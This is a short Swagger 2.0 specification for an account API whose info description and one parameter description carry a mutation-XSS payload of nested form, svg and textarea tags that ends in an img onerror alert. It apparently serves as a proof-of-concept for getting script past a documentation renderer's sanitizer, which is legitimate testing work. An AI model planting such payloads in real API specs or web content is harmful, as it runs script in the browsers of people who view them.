swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('barsu4ara') src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
  '/accounts/groupid/{id}':
    delete:
      parameters:
        - description: |
            <form><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('brasu4ara') src=1>"></form>